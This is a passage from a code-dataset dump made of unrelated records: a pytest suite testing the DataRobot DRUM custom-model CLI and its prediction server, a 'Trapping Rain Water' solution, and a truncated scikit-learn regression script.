problem), None)\n\n @classmethod\n def _get_dataset_filename(cls, framework, problem):\n framework_key = framework\n problem_key = problem\n # if specific dataset for framework was not defined,\n # use default dataset for this problem, e.g. (None, problem)\n framework_key = None if (framework_key, problem_key) not in cls.datasets else framework_key\n return cls.datasets[(framework_key, problem_key)]\n\n @classmethod\n def _get_fixture_filename(cls, language):\n return cls.fixtures[language]\n\n @classmethod\n def _cmd_add_class_labels(cls, cmd, framework, problem):\n if problem != BINARY:\n return cmd\n\n labels = cls._get_class_labels(framework, problem)\n pos = labels[1] if labels else \"yes\"\n neg = labels[0] if labels else \"no\"\n cmd = cmd + \" --positive-class-label {} --negative-class-label {}\".format(pos, neg)\n return cmd\n\n @pytest.mark.parametrize(\n \"framework, problem, language, docker\",\n [\n (SKLEARN, REGRESSION_INFERENCE, NO_CUSTOM, None),\n (SKLEARN, REGRESSION, PYTHON, DOCKER_PYTHON_SKLEARN),\n (SKLEARN, BINARY, PYTHON, None),\n (KERAS, REGRESSION, PYTHON, None),\n (KERAS, BINARY, PYTHON, None),\n (XGB, REGRESSION, PYTHON, None),\n (XGB, BINARY, PYTHON, None),\n (XGB, BINARY, PYTHON_XGBOOST_CLASS_LABELS_VALIDATION, None),\n (PYTORCH, REGRESSION, PYTHON, None),\n (PYTORCH, BINARY, PYTHON, None),\n (RDS, REGRESSION, R, None),\n (RDS, BINARY, R, None),\n (CODEGEN, REGRESSION, NO_CUSTOM, None),\n (CODEGEN, BINARY, NO_CUSTOM, None),\n (POJO, REGRESSION, NO_CUSTOM, None),\n (POJO, BINARY, NO_CUSTOM, None),\n (MOJO, REGRESSION, NO_CUSTOM, None),\n (MOJO, BINARY, NO_CUSTOM, None),\n (MULTI_ARTIFACT, REGRESSION, PYTHON_LOAD_MODEL, None),\n (PYPMML, REGRESSION, NO_CUSTOM, None),\n (PYPMML, BINARY, NO_CUSTOM, None),\n ],\n )\n def test_custom_models_with_drum(self, framework, problem, language, docker, tmp_path):\n custom_model_dir = tmp_path / \"custom_model\"\n self._create_custom_model_dir(custom_model_dir, framework, problem, language)\n\n input_dataset = self._get_dataset_filename(framework, problem)\n\n output = tmp_path / \"output\"\n\n cmd = \"{} score --code-dir {} --input {} --output {}\".format(\n ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset, output\n )\n cmd = self._cmd_add_class_labels(cmd, framework, problem)\n if docker:\n cmd += \" --docker {} --verbose \".format(docker)\n\n TestCMRunner._exec_shell_cmd(\n cmd, \"Failed in {} command line! {}\".format(ArgumentsOptions.MAIN_COMMAND, cmd)\n )\n in_data = pd.read_csv(input_dataset)\n out_data = pd.read_csv(output)\n assert in_data.shape[0] == out_data.shape[0]\n\n @pytest.mark.parametrize(\n \"framework, problem, language\", [(SKLEARN, BINARY, PYTHON), (RDS, BINARY, R)]\n )\n def test_bin_models_with_wrong_labels(self, framework, problem, language, tmp_path):\n custom_model_dir = tmp_path / \"custom_model\"\n self._create_custom_model_dir(custom_model_dir, framework, problem, language)\n\n input_dataset = self._get_dataset_filename(framework, problem)\n cmd = \"{} score --code-dir {} --input {}\".format(\n ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset\n )\n if problem == BINARY:\n cmd = cmd + \" --positive-class-label yes --negative-class-label no\"\n\n p, stdo, stde = TestCMRunner._exec_shell_cmd(\n cmd,\n \"Failed in {} command line! {}\".format(ArgumentsOptions.MAIN_COMMAND, cmd),\n assert_if_fail=False,\n )\n\n stdo_stde = str(stdo) + str(stde)\n\n if framework == SKLEARN:\n assert (\n str(stdo_stde).find(\n \"Wrong class labels. Use class labels detected by sklearn model\"\n )\n != -1\n )\n elif framework == RDS:\n assert (\n str(stdo_stde).find(\n \"Wrong class labels. Use class labels according to your dataset\"\n )\n != -1\n )\n\n # testing negative cases: no artifact, no custom;\n @pytest.mark.parametrize(\n \"framework, problem, language\",\n [\n (None, REGRESSION, NO_CUSTOM), # no artifact, no custom\n (SKLEARN, REGRESSION, R), # python artifact, custom.R\n (RDS, REGRESSION, PYTHON), # R artifact, custom.py\n (None, REGRESSION, R), # no artifact, custom.R without load_model\n (None, REGRESSION, PYTHON), # no artifact, custom.py without load_model\n ],\n )\n def test_detect_language(self, framework, problem, language, tmp_path):\n custom_model_dir = tmp_path / \"custom_model\"\n self._create_custom_model_dir(custom_model_dir, framework, problem, language)\n\n input_dataset = self._get_dataset_filename(framework, problem)\n cmd = \"{} score --code-dir {} --input {}\".format(\n ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset\n )\n if problem == BINARY:\n cmd = cmd + \" --positive-class-label yes --negative-class-label no\"\n\n p, stdo, stde = TestCMRunner._exec_shell_cmd(\n cmd,\n \"Failed in {} command line! {}\".format(ArgumentsOptions.MAIN_COMMAND, cmd),\n assert_if_fail=False,\n )\n\n stdo_stde = str(stdo) + str(stde)\n\n cases_1_2_3 = (\n str(stdo_stde).find(\"Can not detect language by artifacts and/or custom.py/R files\")\n != -1\n )\n case_4 = (\n str(stdo_stde).find(\n \"Could not find a serialized model artifact with .rds extension, supported by default R predictor. \"\n \"If your artifact is not supported by default predictor, implement custom.load_model hook.\"\n )\n != -1\n )\n case_5 = (\n str(stdo_stde).find(\n \"Could not find model artifact file in: {} supported by default predictors\".format(\n custom_model_dir\n )\n )\n != -1\n )\n assert any([cases_1_2_3, case_4, case_5])\n\n # testing negative cases: no artifact, no custom;\n @pytest.mark.parametrize(\n \"framework, problem, language, set_language\",\n [\n (SKLEARN, REGRESSION_INFERENCE, R, \"python\"), # python artifact, custom.R\n (RDS, REGRESSION, PYTHON, \"r\"), # R artifact, custom.py\n (CODEGEN, REGRESSION, PYTHON, \"java\"), # java artifact, custom.py\n (\n CODEGEN_AND_SKLEARN,\n REGRESSION,\n NO_CUSTOM,\n \"java\",\n ), # java and sklearn artifacts, no custom.py\n (\n CODEGEN_AND_SKLEARN,\n REGRESSION,\n NO_CUSTOM,\n \"python\",\n ), # java and sklearn artifacts, no custom.py\n # Negative cases\n (SKLEARN, REGRESSION_INFERENCE, R, None), # python artifact, custom.R\n (RDS, REGRESSION, PYTHON, None), # R artifact, custom.py\n (CODEGEN, REGRESSION, PYTHON, None), # java artifact, custom.py\n (\n CODEGEN_AND_SKLEARN,\n REGRESSION,\n NO_CUSTOM,\n None,\n ), # java and sklearn artifacts, no custom.py\n (\n CODEGEN_AND_SKLEARN,\n REGRESSION,\n NO_CUSTOM,\n \"r\",\n ), # java and sklearn artifacts, no custom.py\n ],\n )\n def test_set_language(self, framework, problem, language, set_language, tmp_path):\n custom_model_dir = tmp_path / \"custom_model\"\n self._create_custom_model_dir(custom_model_dir, framework, problem, language)\n input_dataset = self._get_dataset_filename(framework, problem)\n cmd = \"{} score --code-dir {} --input {}\".format(\n ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset\n )\n if set_language:\n cmd += \" --language {}\".format(set_language)\n if problem == BINARY:\n cmd += \" --positive-class-label yes --negative-class-label no\"\n\n p, stdo, stde = TestCMRunner._exec_shell_cmd(\n cmd,\n \"Failed in {} command line! {}\".format(ArgumentsOptions.MAIN_COMMAND, cmd),\n assert_if_fail=False,\n )\n if not set_language:\n stdo_stde = str(stdo) + str(stde)\n cases_4_5_6_7 = (\n str(stdo_stde).find(\"Can not detect language by artifacts and/or custom.py/R files\")\n != -1\n )\n assert cases_4_5_6_7\n if framework == CODEGEN_AND_SKLEARN and set_language == \"r\":\n stdo_stde = str(stdo) + str(stde)\n case = (\n str(stdo_stde).find(\n \"Could not find a serialized model artifact with .rds extension, supported by default R predictor. \"\n \"If your artifact is not supported by default predictor, implement custom.load_model hook.\"\n )\n != -1\n )\n assert case\n\n @pytest.mark.parametrize(\n \"framework, language\", [(SKLEARN, PYTHON_ALL_HOOKS), (RDS, R_ALL_HOOKS)]\n )\n def test_custom_model_with_all_predict_hooks(self, framework, language, tmp_path):\n custom_model_dir = tmp_path / \"custom_model\"\n self._create_custom_model_dir(custom_model_dir, framework, REGRESSION, language)\n\n input_dataset = self._get_dataset_filename(framework, REGRESSION)\n\n output = tmp_path / \"output\"\n\n cmd = \"{} score --code-dir {} --input {} --output {}\".format(\n ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset, output\n )\n TestCMRunner._exec_shell_cmd(\n cmd, \"Failed in {} command line! {}\".format(ArgumentsOptions.MAIN_COMMAND, cmd)\n )\n preds = pd.read_csv(output)\n assert all(\n val for val in (preds[\"Predictions\"] == len(CustomHooks.ALL_PREDICT)).values\n ), preds\n\n @staticmethod\n def run_server_thread(cmd, process_obj_holder):\n TestCMRunner._exec_shell_cmd(\n cmd,\n \"Failed in {} command line! {}\".format(ArgumentsOptions.MAIN_COMMAND, cmd),\n assert_if_fail=False,\n process_obj_holder=process_obj_holder,\n )\n\n @staticmethod\n def wait_for_server(url, timeout, process_holder):\n # waiting for ping to succeed\n while True:\n try:\n response = requests.get(url)\n if response.ok:\n break\n except Exception:\n pass\n\n time.sleep(1)\n timeout -= 1\n if timeout <= 0:\n if process_holder is not None:\n print(\"Killing subprocess: {}\".format(process_holder.process.pid))\n os.killpg(os.getpgid(process_holder.process.pid), signal.SIGTERM)\n time.sleep(0.25)\n os.killpg(os.getpgid(process_holder.process.pid), signal.SIGKILL)\n\n assert timeout, \"Server failed to start: url: {}\".format(url)\n\n @pytest.mark.parametrize(\n \"framework, problem, language, docker\",\n [\n (SKLEARN, REGRESSION, PYTHON, DOCKER_PYTHON_SKLEARN),\n (SKLEARN, BINARY, PYTHON, None),\n (KERAS, REGRESSION, PYTHON, None),\n (KERAS, BINARY, PYTHON, None),\n (XGB, REGRESSION, PYTHON, None),\n (XGB, BINARY, PYTHON, None),\n (PYTORCH, REGRESSION, PYTHON, None),\n (PYTORCH, BINARY, PYTHON, None),\n (RDS, REGRESSION, R, None),\n (RDS, BINARY, R, None),\n (CODEGEN, REGRESSION, NO_CUSTOM, None),\n (CODEGEN, BINARY, NO_CUSTOM, None),\n (MOJO, REGRESSION, NO_CUSTOM, None),\n (MOJO, BINARY, NO_CUSTOM, None),\n (POJO, REGRESSION, NO_CUSTOM, None),\n (POJO, BINARY, NO_CUSTOM, None),\n (MULTI_ARTIFACT, REGRESSION, PYTHON_LOAD_MODEL, None),\n (PYPMML, REGRESSION, NO_CUSTOM, None),\n (PYPMML, BINARY, NO_CUSTOM, None),\n ],\n )\n def test_custom_models_with_drum_prediction_server(\n self, framework, problem, language, docker, tmp_path\n ):\n custom_model_dir = tmp_path / \"custom_model\"\n TestCMRunner._create_custom_model_dir(custom_model_dir, framework, problem, language)\n\n with DrumServerRun(framework, problem, custom_model_dir, docker) as run:\n input_dataset = self._get_dataset_filename(framework, problem)\n\n # do predictions\n response = requests.post(\n run.url_server_address + \"/predict/\", files={\"X\": open(input_dataset)}\n )\n\n print(response.text)\n assert response.ok\n actual_num_predictions = len(json.loads(response.text)[RESPONSE_PREDICTIONS_KEY])\n in_data = pd.read_csv(input_dataset)\n assert in_data.shape[0] == actual_num_predictions\n\n @pytest.mark.parametrize(\n \"framework, problem, language, docker\",\n [(SKLEARN, REGRESSION, PYTHON, DOCKER_PYTHON_SKLEARN), (SKLEARN, BINARY, PYTHON, None)],\n )\n def test_custom_models_drum_prediction_server_response(\n self, framework, problem, language, docker, tmp_path\n ):\n custom_model_dir = tmp_path / \"custom_model\"\n TestCMRunner._create_custom_model_dir(custom_model_dir, framework, problem, language)\n\n with DrumServerRun(framework, problem, custom_model_dir, docker) as run:\n input_dataset = self._get_dataset_filename(framework, problem)\n\n # do predictions\n response = requests.post(\n run.url_server_address + \"/predict/\", files={\"X\": open(input_dataset)}\n )\n\n assert response.ok\n response_json = json.loads(response.text)\n assert isinstance(response_json, dict)\n assert RESPONSE_PREDICTIONS_KEY in response_json\n predictions_list = response_json[RESPONSE_PREDICTIONS_KEY]\n assert isinstance(predictions_list, list)\n assert len(predictions_list)\n prediction_item = predictions_list[0]\n if problem == BINARY:\n assert isinstance(prediction_item, dict)\n assert len(prediction_item) == 2\n assert all([isinstance(x, str) for x in prediction_item.keys()])\n assert all([isinstance(x, float) for x in prediction_item.values()])\n elif problem == REGRESSION:\n assert isinstance(prediction_item, float)\n\n @pytest.mark.parametrize(\n \"framework, problem, language, docker\",\n [(SKLEARN, BINARY, PYTHON, None), (SKLEARN, REGRESSION, PYTHON, DOCKER_PYTHON_SKLEARN)],\n )\n def test_custom_models_perf_test(self, framework, problem, language, docker, tmp_path):\n custom_model_dir = tmp_path / \"custom_model\"\n self._create_custom_model_dir(custom_model_dir, framework, problem, language)\n\n input_dataset = self._get_dataset_filename(framework, problem)\n\n cmd = \"{} perf-test -i 10 -s 1000 --code-dir {} --input {}\".format(\n ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset\n )\n cmd = self._cmd_add_class_labels(cmd, framework, problem)\n if docker:\n cmd += \" --docker {}\".format(docker)\n\n TestCMRunner._exec_shell_cmd(\n cmd, \"Failed in {} command line! {}\".format(ArgumentsOptions.MAIN_COMMAND, cmd)\n )\n\n @pytest.mark.parametrize(\n \"framework, problem, language, docker\",\n [\n (SKLEARN, BINARY, PYTHON, None),\n (SKLEARN, REGRESSION, PYTHON, DOCKER_PYTHON_SKLEARN),\n (SKLEARN, REGRESSION_INFERENCE, NO_CUSTOM, None),\n (SKLEARN, REGRESSION_INFERENCE, NO_CUSTOM, DOCKER_PYTHON_SKLEARN),\n ],\n )\n def test_custom_models_validation_test(self, framework, problem, language, docker, tmp_path):\n custom_model_dir = tmp_path / \"custom_model\"\n self._create_custom_model_dir(custom_model_dir, framework, problem, language)\n\n input_dataset = self._get_dataset_filename(framework, problem)\n\n cmd = \"{} validation --code-dir {} --input {}\".format(\n ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset\n )\n cmd = self._cmd_add_class_labels(cmd, framework, problem)\n if docker:\n cmd += \" --docker {}\".format(docker)\n\n p, stdo, stde = TestCMRunner._exec_shell_cmd(\n cmd,\n \"Failed in {} command line! {}\".format(ArgumentsOptions.MAIN_COMMAND, cmd),\n assert_if_fail=False,\n )\n\n if language == NO_CUSTOM:\n assert re.search(r\"Null value imputation\\s+FAILED\", stdo)\n else:\n assert re.search(r\"Null value imputation\\s+PASSED\", stdo)\n\n @pytest.mark.parametrize(\"language, language_suffix\", [(\"python\", \".py\"), (\"r\", \".R\")])\n def test_template_creation(self, language, language_suffix, tmp_path):\n print(\"Running template creation tests: {}\".format(language))\n directory = tmp_path / \"template_test_{}\".format(uuid4())\n\n cmd = \"{drum_prog} new model --language {language} --code-dir {directory}\".format(\n drum_prog=ArgumentsOptions.MAIN_COMMAND, language=language, directory=directory\n )\n\n TestCMRunner._exec_shell_cmd(\n cmd, \"Failed creating a template for custom model, cmd={}\".format(cmd)\n )\n\n assert os.path.isdir(directory), \"Directory {} does not exists (or not a dir)\".format(\n directory\n )\n\n assert os.path.isfile(os.path.join(directory, \"README.md\"))\n custom_file = os.path.join(directory, CUSTOM_FILE_NAME + language_suffix)\n assert os.path.isfile(custom_file)\n\n @staticmethod\n def _add_weights_cmd(weights, input_csv):\n df = pd.read_csv(input_csv)\n colname = \"some-colname\"\n weights_data = pd.Series(np.random.randint(1, 3, len(df)))\n __keep_this_around = NamedTemporaryFile(\"w\")\n if weights == WEIGHTS_ARGS:\n df[colname] = weights_data\n df.to_csv(__keep_this_around.name)\n return \" --row-weights \" + colname, __keep_this_around.name, __keep_this_around\n elif weights == WEIGHTS_CSV:\n weights_data.to_csv(__keep_this_around.name)\n return \" --row-weights-csv \" + __keep_this_around.name, input_csv, __keep_this_around\n\n return \"\", input_csv, __keep_this_around\n\n @pytest.mark.parametrize(\"framework\", [RDS, SKLEARN, XGB, KERAS, PYTORCH])\n @pytest.mark.parametrize(\"problem\", [BINARY, REGRESSION])\n @pytest.mark.parametrize(\"docker\", [DOCKER_PYTHON_SKLEARN, None])\n @pytest.mark.parametrize(\"weights\", [WEIGHTS_CSV, WEIGHTS_ARGS, None])\n @pytest.mark.parametrize(\"use_output\", [True, False])\n @pytest.mark.parametrize(\"nested\", [True, False])\n def test_fit(self, framework, problem, docker, weights, use_output, tmp_path, nested):\n if docker and framework != SKLEARN:\n return\n if framework == RDS:\n language = R_FIT\n else:\n language = PYTHON\n\n custom_model_dir = tmp_path / \"custom_model\"\n self._create_custom_model_dir(\n custom_model_dir,\n framework,\n problem,\n language,\n is_training=True,\n nested=nested if language == PYTHON else False, # TODO: support nested R files\n )\n\n input_dataset = self._get_dataset_filename(framework, problem)\n\n weights_cmd, input_dataset, __keep_this_around = self._add_weights_cmd(\n weights, input_dataset\n )\n\n output = tmp_path / \"output\"\n output.mkdir()\n\n cmd = \"{} fit --code-dir {} --target {} --input {} --verbose \".format(\n ArgumentsOptions.MAIN_COMMAND, custom_model_dir, self.target[problem], input_dataset\n )\n if use_output:\n cmd += \" --output {}\".format(output)\n if problem == BINARY:\n cmd = self._cmd_add_class_labels(cmd, framework, problem)\n if docker:\n cmd += \" --docker {} \".format(docker)\n\n cmd += weights_cmd\n\n TestCMRunner._exec_shell_cmd(\n cmd, \"Failed in {} command line! {}\".format(ArgumentsOptions.MAIN_COMMAND, cmd)\n )\n\n def _create_fit_input_data_dir(self, input_dir, problem, weights):\n input_dir.mkdir(parents=True, exist_ok=True)\n\n input_dataset = self._get_dataset_filename(None, problem)\n df = pd.read_csv(input_dataset)\n\n # Training data\n with open(os.path.join(input_dir, \"X.csv\"), \"w+\") as fp:\n feature_df = df.loc[:, df.columns != self.target[problem]]\n feature_df.to_csv(fp, index=False)\n\n # Target data\n with open(os.path.join(input_dir, \"y.csv\"), \"w+\") as fp:\n target_series = df[self.target[problem]]\n target_series.to_csv(fp, index=False, header=\"Target\")\n\n # Weights data\n if weights:\n df = pd.read_csv(input_dataset)\n weights_data = pd.Series(np.random.randint(1, 3, len(df)))\n with open(os.path.join(input_dir, \"weights.csv\"), \"w+\") as fp:\n weights_data.to_csv(fp, header=False)\n\n @pytest.mark.parametrize(\"framework\", [SKLEARN, XGB, KERAS])\n @pytest.mark.parametrize(\"problem\", [BINARY, REGRESSION])\n @pytest.mark.parametrize(\"language\", [PYTHON])\n @pytest.mark.parametrize(\"weights\", [WEIGHTS_CSV, None])\n def test_fit_sh(self, framework, problem, language, weights, tmp_path):\n custom_model_dir = tmp_path / \"custom_model\"\n self._create_custom_model_dir(\n custom_model_dir, framework, problem, language, is_training=True\n )\n\n env = os.environ\n fit_sh = os.path.join(\n self.tests_root_path,\n \"..\",\n \"public_dropin_environments/{}_{}/fit.sh\".format(language, framework),\n )\n\n input_dir = tmp_path / \"input_dir\"\n self._create_fit_input_data_dir(input_dir, problem, weights)\n\n output = tmp_path / \"output\"\n output.mkdir()\n\n env[\"CODEPATH\"] = str(custom_model_dir)\n env[\"INPUT_DIRECTORY\"] = str(input_dir)\n env[\"ARTIFACT_DIRECTORY\"] = str(output)\n\n if problem == BINARY:\n labels = self._get_class_labels(framework, problem)\n env[\"NEGATIVE_CLASS_LABEL\"] = labels[0]\n env[\"POSITIVE_CLASS_LABEL\"] = labels[1]\n else:\n if os.environ.get(\"NEGATIVE_CLASS_LABEL\"):\n del os.environ[\"NEGATIVE_CLASS_LABEL\"]\n del os.environ[\"POSITIVE_CLASS_LABEL\"]\n\n TestCMRunner._exec_shell_cmd(fit_sh, \"Failed cmd {}\".format(fit_sh), env=env)\n\n def test_fit_simple(self, tmp_path):\n custom_model_dir = tmp_path / \"custom_model\"\n self._create_custom_model_dir(\n custom_model_dir, SIMPLE, REGRESSION, PYTHON, is_training=True, nested=True\n )\n\n input_dataset = self._get_dataset_filename(SKLEARN, REGRESSION)\n\n output = tmp_path / \"output\"\n output.mkdir()\n\n cmd = \"{} fit --code-dir {} --target {} --input {} --verbose\".format(\n ArgumentsOptions.MAIN_COMMAND, custom_model_dir, self.target[REGRESSION], input_dataset,\n )\n TestCMRunner._exec_shell_cmd(\n cmd, \"Failed in {} command line! {}\".format(ArgumentsOptions.MAIN_COMMAND, cmd)\n )\n\n\nclass TestDrumRuntime:\n @classmethod\n def setup_class(cls):\n TestCMRunner.setup_class()\n\n Options = collections.namedtuple(\n \"Options\",\n \"with_error_server {} docker address verbose show_stacktrace\".format(\n CMRunnerArgsRegistry.SUBPARSER_DEST_KEYWORD\n ),\n defaults=[RunMode.SERVER, None, \"localhost\", False, True],\n )\n\n class StubDrumException(Exception):\n pass\n\n @mock.patch(\"datarobot_drum.drum.runtime.run_error_server\")\n def test_no_exceptions(self, mock_run_error_server):\n with DrumRuntime():\n pass\n\n mock_run_error_server.assert_not_called()\n\n @mock.patch(\"datarobot_drum.drum.runtime.run_error_server\")\n def test_exception_no_options(self, mock_run_error_server):\n with pytest.raises(TestDrumRuntime.StubDrumException):\n with DrumRuntime():\n raise TestDrumRuntime.StubDrumException()\n\n mock_run_error_server.assert_not_called()\n\n @mock.patch(\"datarobot_drum.drum.runtime.run_error_server\")\n def test_exception_initialization_succeeded(self, mock_run_error_server):\n with pytest.raises(TestDrumRuntime.StubDrumException):\n with DrumRuntime() as runtime:\n runtime.options = TestDrumRuntime.Options(False)\n runtime.initialization_succeeded = True\n raise TestDrumRuntime.StubDrumException()\n\n mock_run_error_server.assert_not_called()\n\n @mock.patch(\"datarobot_drum.drum.runtime.run_error_server\")\n def test_exception_not_server_mode(self, mock_run_error_server):\n with pytest.raises(TestDrumRuntime.StubDrumException):\n with DrumRuntime() as runtime:\n runtime.options = TestDrumRuntime.Options(False, RunMode.SCORE)\n runtime.initialization_succeeded = False\n raise TestDrumRuntime.StubDrumException()\n\n mock_run_error_server.assert_not_called()\n\n @mock.patch(\"datarobot_drum.drum.runtime.run_error_server\")\n def test_exception_not_server_mode(self, mock_run_error_server):\n with pytest.raises(TestDrumRuntime.StubDrumException):\n with DrumRuntime() as runtime:\n runtime.options = TestDrumRuntime.Options(False, RunMode.SERVER, \"path_to_image\")\n runtime.initialization_succeeded = False\n raise TestDrumRuntime.StubDrumException()\n\n mock_run_error_server.assert_not_called()\n\n @mock.patch(\"datarobot_drum.drum.runtime.run_error_server\")\n def test_exception_no_with_error_server(self, mock_run_error_server):\n with pytest.raises(TestDrumRuntime.StubDrumException):\n with DrumRuntime() as runtime:\n runtime.options = TestDrumRuntime.Options(False)\n runtime.initialization_succeeded = False\n raise TestDrumRuntime.StubDrumException()\n\n mock_run_error_server.assert_not_called()\n\n @mock.patch(\"datarobot_drum.drum.runtime.run_error_server\")\n def test_exception_with_error_server(self, mock_run_error_server):\n with pytest.raises(TestDrumRuntime.StubDrumException):\n with DrumRuntime() as runtime:\n runtime.options = TestDrumRuntime.Options(True)\n runtime.initialization_succeeded = False\n raise TestDrumRuntime.StubDrumException()\n\n mock_run_error_server.assert_called()\n\n @pytest.fixture(params=[REGRESSION, BINARY])\n def params(self, request, tmp_path):\n framework = SKLEARN\n language = PYTHON\n\n problem = request.param\n\n custom_model_dir = tmp_path / \"custom_model\"\n TestCMRunner._create_custom_model_dir(custom_model_dir, framework, problem, language)\n\n server_run_args = dict(\n framework=framework, problem=problem, custom_model_dir=custom_model_dir,\n )\n\n return framework, problem, custom_model_dir, server_run_args\n\n def assert_drum_server_run_failure(self, server_run_args, with_error_server, error_message):\n drum_server_run = DrumServerRun(**server_run_args, with_error_server=with_error_server)\n\n if with_error_server:\n # assert that error the server is up and message is propagated via API\n with drum_server_run as run:\n # check /health/ route\n response = requests.get(run.url_server_address + \"/health/\")\n assert response.status_code == 513\n assert error_message in response.json()[\"message\"]\n\n # check /predict/ route\n response = requests.post(run.url_server_address + \"/predict/\")\n\n assert response.status_code == 513\n assert error_message in response.json()[\"message\"]\n else:\n # DrumServerRun tries to ping the server.\n # assert that the process is already dead we it's done.\n with pytest.raises(ProcessLookupError), drum_server_run:\n pass\n\n assert drum_server_run.process.returncode == 1\n assert error_message in drum_server_run.process.err_stream\n\n @pytest.mark.parametrize(\"with_error_server\", [False, True])\n def test_e2e_no_model_artifact(self, params, with_error_server):\n \"\"\"\n Verify that if an error occurs on drum server initialization if no model artifact is found\n - if '--with-error-server' is not set, drum server process will exit with error\n - if '--with-error-server' is set, 'error server' will still be started, and\n will be serving initialization error\n \"\"\"\n _, _, custom_model_dir, server_run_args = params\n\n error_message = \"Could not find model artifact file\"\n\n # remove model artifact\n for item in os.listdir(custom_model_dir):\n if item.endswith(PythonArtifacts.PKL_EXTENSION):\n os.remove(os.path.join(custom_model_dir, item))\n\n self.assert_drum_server_run_failure(server_run_args, with_error_server, error_message)\n\n @pytest.mark.parametrize(\"with_error_server\", [False, True])\n def test_e2e_model_loading_fails(self, params, with_error_server):\n \"\"\"\n Verify that if an error occurs on drum server initialization if model cannot load properly\n - if '--with-error-server' is not set, drum server process will exit with error\n - if '--with-error-server' is set, 'error server' will still be started, and\n will be serving initialization error\n \"\"\"\n _, _, custom_model_dir, server_run_args = params\n\n error_message = (\n \"Could not find any framework to handle loaded model and a score hook is not provided\"\n )\n\n # make model artifact invalid by erasing its content\n for item in os.listdir(custom_model_dir):\n if item.endswith(PythonArtifacts.PKL_EXTENSION):\n with open(os.path.join(custom_model_dir, item), \"wb\") as f:\n f.write(pickle.dumps(\"invalid model content\"))\n\n self.assert_drum_server_run_failure(server_run_args, with_error_server, error_message)\n\n @pytest.mark.parametrize(\"with_error_server\", [False, True])\n def test_e2e_predict_fails(self, params, with_error_server):\n \"\"\"\n Verify that when drum server is started, if an error occurs on /predict/ route,\n 'error server' is not started regardless '--with-error-server' flag.\n \"\"\"\n framework, problem, custom_model_dir, server_run_args = params\n\n # remove a module required during processing of /predict/ request\n os.remove(os.path.join(custom_model_dir, \"custom.py\"))\n\n drum_server_run = DrumServerRun(**server_run_args, with_error_server=with_error_server)\n\n with drum_server_run as run:\n input_dataset = TestCMRunner._get_dataset_filename(framework, problem)\n\n response = requests.post(\n run.url_server_address + \"/predict/\", files={\"X\": open(input_dataset)}\n )\n\n assert response.status_code == 500 # error occurs\n\n # assert that 'error server' is not started.\n # as 'error server' propagates errors with 513 status code,\n # assert that after error occurred, the next request is not 513\n\n # check /health/ route\n response = requests.get(run.url_server_address + \"/health/\")\n assert response.status_code == 200\n\n # check /predict/ route\n response = requests.post(run.url_server_address + \"/predict/\")\n\n error_message = \"ERROR: Samples should be provided as a csv file under `X` key.\"\n assert response.status_code == 422\n assert response.json()[\"message\"] == error_message\n\n assert drum_server_run.process.returncode == 0\n","sub_path":"tests/drum/test_custom_model.py","file_name":"test_custom_model.py","file_ext":"py","file_size_in_byte":44523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"421467715","text":"class Solution:\n # Scan from left to right and right to left\n # to get the maximum height that height[i] could reach\n # by going left or right or itself\n # water at this block = min(left, right) - height\n # Time: O(n)\n # Space: O(n)\n def trap(self, height: List[int]) -> int:\n if not height:\n return 0\n\n length = len(height)\n left_max = [0] * length\n right_max = [0] * length\n\n left_max[0] = height[0]\n for i in range(1, length):\n left_max[i] = max(height[i], left_max[i - 1])\n\n right_max[length - 1] = height[length - 1]\n for i in range(length - 2, -1, -1):\n right_max[i] = max(height[i], right_max[i + 1])\n\n result = 0\n for i in range(1, length - 1):\n result += min(left_max[i], right_max[i]) - height[i]\n\n return result","sub_path":"Amazon/DP/Trapping Rain Water/dp.py","file_name":"dp.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"241842431","text":"\nimport numpy as np\nimport fileinput\nfrom sklearn import linear_model\nfrom sklearn import preprocessing\nfrom sklearn import cross_validation\nfrom sklearn.pipeline import Pipeline\n\n\ndef import_data():\n\n\tline_num = 0\n\tdata_row = 0\n\tfor line in fileinput.input():\n\t if line_num == 0:\n\t arg_num, train_row = line.split()\n\t arg_num, train_row = int(arg_num), int(train_row)\n\t X = np.zeros((train_row, arg_num))\n\t Y = np.zeros((train_row, 1))\n\t elif line_num <= train_row:\n\t spl = line.split()\n\t for i in range(arg_num):\n\t \tX[data_row, i] = float(spl[i])\n\t Y[data_row] = float(spl[i+1])\n\t data_row +=1\n\t if line_num == train_row+1:\n\t \ttest_row = float(line)\n\t \tX_test = np.zeros((test_row, arg_num))\n\t \trow = 0\n\t if line_num > train_row+1:\n\t \tspl = line.split()\n\t \tfor i in range(arg_num):\n\t \t\tX_test[row, i] = float(spl[i])\n\t \trow+=1\n\n\t line_num+=1\n\n\treturn X, Y, X_test\n\ndef main():\n\n\tX, Y, X_t = import_data()\n\n\tX_n = preprocessing.scale(X)\n\tX_t_n = preprocessing.scale(X_t)\n\n\tX_train, X_test, y_train, y_test = cross_validation.train_test_split(X_n, Y)\n\n\t# # Linear regression \n\t# alpha = np.arange(0.001, 2.0, 0.001, np.float)\n\n\t# best_alpha = 0\n\t# best_score = 0\n\n\t# for a in alpha:\n\t# \tclf = linear_model.Ridge (alpha = a)\n\t# \tclf.fit(X_train, y_train)\n\t# \tsc = clf.score(X_test, y_test)\n\t# \tif sc > best_score:\n\t# \t\tbest_alpha = a\n\t# \t\tbest_score = sc\n\n\t# print(\"best score for linear model : {0}\".format(best_score))\n\n\t# # Poly regression\n\t# best_score_poly = 0\n\t# best_deg = 0\n\t# deg = np.arange(1, 7, 1)\n\t# for i in deg:\n\t# \tmodel_poly = Pipeline([('poly', preprocessing.PolynomialFeatures(degree=i)), \n\t# \t\t\t\t\t('linear', linear_model.LinearRegression(fit_intercept=False))])\n\t# \tmodel_poly.fit(X_train, y_train)\n\t# \tsc = model_poly.score(X_test, y_test)\n\t# \tif sc > best_score:\n\t# \t\tbest_score_poly = sc\n\t# \t\tbest_deg = i\n\n\t# print(\"best score for poly model deg {0} : {1}\".format(best_deg, best_score_poly))\n\n\t# # Poly regression ridge\n\t# 